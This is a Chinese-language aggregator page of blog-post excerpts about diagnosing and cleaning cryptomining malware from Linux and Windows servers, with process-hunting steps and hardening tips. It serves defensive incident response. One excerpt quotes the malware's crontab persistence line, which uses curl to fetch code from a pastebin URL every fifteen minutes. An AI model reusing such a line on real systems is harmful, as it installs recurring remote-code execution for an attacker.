原文:服務器又100%了,上一個挖礦病毒解決完,這幾天又來了一個新的挖礦病毒。。。。

首先:又是經典的寶塔cpu 。 還是先看進程 pstree這次是正常的,沒看到異常的進程樹 然后 top 發現一個 ext 一個中括號的進程占用了 的cpu 我把這個進程單獨看了一下 top Hp PID 然后按了一下c,出現了這個。 進文件夾看看這又是個啥吧 病毒挖礦文件 sh文件: config.json文件,中間一段: 也不懂什么意思,就只能刪干凈一下,然后把那個進程kill PID 之后服 ...

2021-08-31 17:46 0 122 推薦指數:

查看詳情

解決挖礦病毒【Xmrig miner 】CPU 100%服務器卡死問題

背景: 突然有一天,服務器訪問很慢很慢,進程查看發現CPU是100%,而且沒有任何降低的意思 收集: 打開任務管理,進程查看中CPU排序,發現一個System的進程,第一想法以為是空閑利用,發現結束掉之后瞬間又起來的 查了下描述中寫的“Xmrig miner ”,全是挖礦病毒,試了 ...

Sat Mar 14 02:00:00 CST 2020 0 3786
服務器中了挖礦病毒

這幾天阿里雲雲服務器cpu一直跑滿,一查發現有個定時任務,在搜索一下,發現自己中毒了,原來前幾天搞redis學習的時候設置了個弱密碼,被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...

Sat Apr 13 20:26:00 CST 2019 0 1536
服務器挖礦病毒解決方案

記錄一次解決挖礦病毒的過程(進程:susupdate,networkservice) 目錄 1.找出病毒進程 2.根據進程號找到運行文件的位置 3.刪除病毒進程 4.刪除病毒文件 4.1 文件無法正常刪除如何解決? 5. ...

Fri Mar 12 01:20:00 CST 2021 1 756
服務器被植入挖礦病毒解決辦法

服務器被植入挖礦,剛解決,參考文章! 上午重啟服務的時候,發現程序啟動死慢,用top命令查看了一下,cpu被占用接近100%,所以無法運行程序,通過top命令然后輸入P,就能看到有兩個程序幾乎占用了所有的CPU,占用率為700%左右,程序名稱為:minerd和AnXqV兩個,通過搜索知道 ...

Sun Feb 26 02:37:00 CST 2017 0 25273
Linux 服務器上有挖礦病毒處理【分析+解決

Linux 服務器上有挖礦病毒處理 分析 今天遇到病毒挖礦,有點小興奮。 來波分析: 看上面的症狀是:攻擊者通過docker入侵的【后面了解,可能是redis賬號密碼簡單的原因被爆破的】 最奇詭的事,攻擊者可能通過提權,獲取到root的權限。然后一些列的挖礦病毒 大致流程圖 ...

Thu Apr 02 00:13:00 CST 2020 0 3599
挖礦木馬】服務器挖礦病毒入侵的清理思路

一般情況下,挖礦病毒都是自動掃描+自動掛馬生成的,並不會是有專人進行攻擊,所以也比較好清除,注意清除之后需要 check 有無后門。 最重要幾點(也可能是被hack的原因):禁止 ROOT 用戶登陸,ROOT 不能使用弱密碼,FRP 需要配置,不能使用默認選項。 挖礦進程占用的 CPU 資源 ...

Wed Jan 06 19:27:00 CST 2021 0 515
阿里雲服務器centos7挖礦病毒處理

處理過程: 1、查找異常進程,確定病毒進程,定位病毒腳本的執行用戶 2、殺掉病毒進程,注意要檢查清楚,病毒進程可能有多個,同時也要注意不要誤刪系統進程或者阿里雲的進程 3、檢查定時任務,一般都會有,以達到病毒自啟的效果,通過定時任務內容定位病毒腳本的位置,然后刪除病毒腳本 4、整改 ...

Thu Mar 26 17:08:00 CST 2020 0 1306
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM